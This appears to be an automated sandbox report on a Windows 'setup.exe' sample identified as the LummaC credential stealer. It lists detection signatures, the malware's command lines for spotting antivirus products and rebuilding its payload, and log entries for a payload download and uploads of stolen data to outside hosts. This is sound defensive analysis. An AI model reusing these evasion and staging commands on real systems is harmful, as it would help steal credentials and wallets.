Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:	setup.exe
Analysis ID:	1663247
MD5:	3b5fc901b53fe3e365071f6c8beee90b
SHA1:	3ec302af41f69d8d57d35bba3a40570bd3c13110
SHA256:	1717f135b5854ecc4dfc8230c30234a2ab60020954d7c5e44ea4dcf268d52b13
Tags:	AutoITexeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer

Score:	92
Range:	0 - 100
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Yara detected LummaC Stealer

Drops PE files with a suspicious file extension

Joe Sandbox ML detected suspicious sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Suspicious Copy From or To System Directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

setup.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 3B5FC901B53FE3E365071F6C8BEEE90B)

cmd.exe (PID: 1700 cmdline: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2044 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5452 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 1052 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3744 cmdline: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3308 cmdline: cmd /c md 826825 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 7728 cmdline: extrac32 /Y /E Mods.vob MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 7748 cmdline: findstr /V "Previously" Mean MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 8088 cmdline: cmd /c copy /b 826825\Motion.com + Elephant + Diabetes + Severe + Tears + Slovakia + Laser + Vocal + Defend + Mixing 826825\Motion.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 4792 cmdline: cmd /c copy /b ..\Fake.vob + ..\Shock.vob + ..\Examples.vob + ..\Why.vob + ..\Girl.vob + ..\Error.vob + ..\Protective.vob g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Motion.com (PID: 7336 cmdline: Motion.com g MD5: 62D09F076E6E0240548C2F837536A46A)

WerFault.exe (PID: 2712 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1116 MD5: C31336C1EFC2CCB44B4326EA793040F2)

choice.exe (PID: 7532 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 7628, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat, ProcessId: 1700, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" , CommandLine: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1700, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" , ProcessId: 3744, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-11T16:12:31.946848+0200	2028371	3	Unknown Traffic	192.168.2.5	49698	172.67.133.158	443	TCP
2025-04-11T16:12:33.400281+0200	2028371	3	Unknown Traffic	192.168.2.5	49699	172.67.133.158	443	TCP
2025-04-11T16:12:35.032892+0200	2028371	3	Unknown Traffic	192.168.2.5	49700	172.67.133.158	443	TCP
2025-04-11T16:12:36.067409+0200	2028371	3	Unknown Traffic	192.168.2.5	49701	172.67.133.158	443	TCP
2025-04-11T16:12:40.903266+0200	2028371	3	Unknown Traffic	192.168.2.5	49702	172.67.133.158	443	TCP
2025-04-11T16:12:41.866609+0200	2028371	3	Unknown Traffic	192.168.2.5	49703	172.67.133.158	443	TCP
2025-04-11T16:12:43.105302+0200	2028371	3	Unknown Traffic	192.168.2.5	49704	172.67.133.158	443	TCP
2025-04-11T16:12:45.390828+0200	2028371	3	Unknown Traffic	192.168.2.5	49705	172.67.133.158	443	TCP
2025-04-11T16:12:46.303287+0200	2028371	3	Unknown Traffic	192.168.2.5	49706	172.67.141.59	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: setup.exe	Virustotal: Detection: 36%			Perma Link
Source: setup.exe	ReversingLabs: Detection: 41%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 95.1%

Source: setup.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.141.59:443 -> 192.168.2.5:49706 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\setup.exe	Code function: 0_2_00405B6C FindFirstFileW,FindClose,		0_2_00405B6C
Source: C:\Users\user\Desktop\setup.exe	Code function: 0_2_0040652D DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		0_2_0040652D

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\826825	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\826825\	Jump to behavior

Source: global traffic

HTTP traffic detected: GET /shark.bin HTTP/1.1Connection: Keep-AliveHost: h1.mockupeastcoast.shop

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49700 -> 172.67.133.158:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49698 -> 172.67.133.158:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 172.67.133.158:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.133.158:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49702 -> 172.67.133.158:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49703 -> 172.67.133.158:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.141.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49701 -> 172.67.133.158:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49699 -> 172.67.133.158:443

Source: global traffic	HTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 87Host: vqaliantheart.live
Source: global traffic	HTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UW3p3hYGf1xlKf1OEbUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14927Host: vqaliantheart.live
Source: global traffic	HTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IU8EQ57p12lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15041Host: vqaliantheart.live
Source: global traffic	HTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9xbpOMlESQ9v3j6xUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20560Host: vqaliantheart.live
Source: global traffic	HTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2nEASM1frbnjY9vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 5459Host: vqaliantheart.live
Source: global traffic	HTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=rAd2p63M2vnlG83Gz5dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2731Host: vqaliantheart.live
Source: global traffic	HTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A1lhfllxYn63CY6G8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 578985Host: vqaliantheart.live
Source: global traffic	HTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 125Host: vqaliantheart.live

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /shark.bin HTTP/1.1Connection: Keep-AliveHost: h1.mockupeastcoast.shop

Source: global traffic	DNS traffic detected: DNS query: HpKmdADIFCrtC.HpKmdADIFCrtC
Source: global traffic	DNS traffic detected: DNS query: vqaliantheart.live
Source: global traffic	DNS traffic detected: DNS query: h1.mockupeastcoast.shop

Source: unknown

HTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 87Host: vqaliantheart.live

Source: setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: setup.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Mixing.13.dr, Motion.com.5.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Mixing.13.dr, Motion.com.5.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Mixing.13.dr, Motion.com.5.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Mixing.13.dr, Motion.com.5.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Mixing.13.dr, Motion.com.5.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: setup.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: setup.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: setup.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: setup.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: setup.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: setup.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: setup.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: setup.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: setup.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Mixing.13.dr, Motion.com.5.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: setup.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: Mixing.13.dr, Motion.com.5.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Mixing.13.dr, Motion.com.5.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Mixing.13.dr, Motion.com.5.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Mixing.13.dr, Motion.com.5.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Mixing.13.dr, Motion.com.5.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Amcache.hve.24.dr	String found in binary or memory: http://upx.sf.net
Source: Motion.com, 00000011.00000000.1318165894.0000000000625000.00000002.00000001.01000000.00000007.sdmp, Defend.13.dr, Motion.com.5.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: setup.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: Mixing.13.dr, Motion.com.5.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Motion.com.5.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.141.59:443 -> 192.168.2.5:49706 version: TLS 1.2

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_00404B88 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404B88

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_004033E9 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

0_2_004033E9

Source: C:\Users\user\Desktop\setup.exe	File created: C:\Windows\TravelingWrapping	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	File created: C:\Windows\SummariesAdaptation	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	File created: C:\Windows\PotteryDetection	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	File created: C:\Windows\ShelterPrize	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	File created: C:\Windows\DropFolk	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Code function: 0_2_00406947		0_2_00406947
Source: C:\Users\user\Desktop\setup.exe	Code function: 0_2_00404451		0_2_00404451

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\826825\Motion.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1116

Source: setup.exe

Static PE information: invalid certificate

Source: setup.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@27/27@3/2

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_00403FDF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00403FDF

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_00402218 CoCreateInstance,

0_2_00402218

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7336

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Users\user\AppData\Local\Temp\nsn52A1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat

Source: setup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: setup.exe	Virustotal: Detection: 36%
Source: setup.exe	ReversingLabs: Detection: 41%

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\user\Desktop\setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 826825
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Mods.vob
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Previously" Mean
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 826825\Motion.com + Elephant + Diabetes + Severe + Tears + Slovakia + Laser + Vocal + Defend + Mixing 826825\Motion.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Fake.vob + ..\Shock.vob + ..\Examples.vob + ..\Why.vob + ..\Girl.vob + ..\Error.vob + ..\Protective.vob g
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\826825\Motion.com Motion.com g
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1116
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 826825	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Mods.vob	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Previously" Mean	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 826825\Motion.com + Elephant + Diabetes + Severe + Tears + Slovakia + Laser + Vocal + Defend + Mixing 826825\Motion.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Fake.vob + ..\Shock.vob + ..\Examples.vob + ..\Why.vob + ..\Girl.vob + ..\Error.vob + ..\Protective.vob g	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\826825\Motion.com Motion.com g	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: msacm32.dll	Jump to behavior
